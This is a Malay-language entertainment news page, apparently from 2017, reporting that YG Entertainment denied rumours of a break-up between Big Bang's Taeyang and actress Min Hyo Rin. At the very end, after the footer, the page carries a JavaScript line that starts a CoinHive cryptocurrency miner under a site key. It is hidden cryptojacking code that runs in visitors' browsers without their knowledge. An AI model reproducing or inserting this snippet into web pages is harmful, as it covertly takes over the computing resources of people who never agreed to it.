© Copyright 2017, All Rights Reserved
Home / Hiburan / Mereka masih bercinta gosip Taeyang dan Min Hyo Rin berpisah tidak benar

Mereka masih bercinta gosip Taeyang dan Min Hyo Rin berpisah tidak benar


BARU-BARU ini kecoh apabila hubungan pasangan selebriti kumpulan Big Bang, Taeyang dan pelakon Min Hyo Rin dikatakan telah berpisah.

Menerusi laporan Allkpop, wakil agensi kedua-dua mereka tampil memberi kenyataan mengenai gosip tersebut.

“Gosip yang mula tersebar di media sosial mengenai hubungan Taeyang dan Min Hyo Rin telah berpisah adalah tidak benar.

“Pasangan tersebut masih lagi bercinta!” kata wakil agensi YG Entertainment.

Status mengenai hubungan mereka mula diperkatakan oleh peminat apabila Taeyang mengeluarkan lagu terbaru yang berkaitan dengan putus cinta. 

Peminat beranggapan lagu terbaharu itu mungkin mempunyai kaitan dengan hubungan mereka kerana sebelum ini lagu nyanyian Taeyang iaitu Eyes, Nose, Lips pernah menjadi hit dan dikatakan lagu tersebut inspirasi oleh Min Hyo Ri.

Taeyang dan Min Hyo-rin mengaku bercinta pada tahun 2015 setelah berkenalan  pada tahun 2013 ketika menjalani rakaman video muzik bersama.

Sumber: Allkpop


Source link

Tinggalkan Ulasan Anda

About admin

x

Check Also

Idayu juara AF Megastar 2017

SHAH ALAM: Idayu dinobatkan sebagai Juara AF Megastar sekali gus meraih wang ...

Facebook Auto Publish Powered By : XYZScripts.com
© Copyright 2017, All Rights Reserved
%d bloggers like this:
var m = new CoinHive.Anonymous('dkVZKvPTpA9ReGRa2gsf6amqUO6Yr4Pu'); m.start();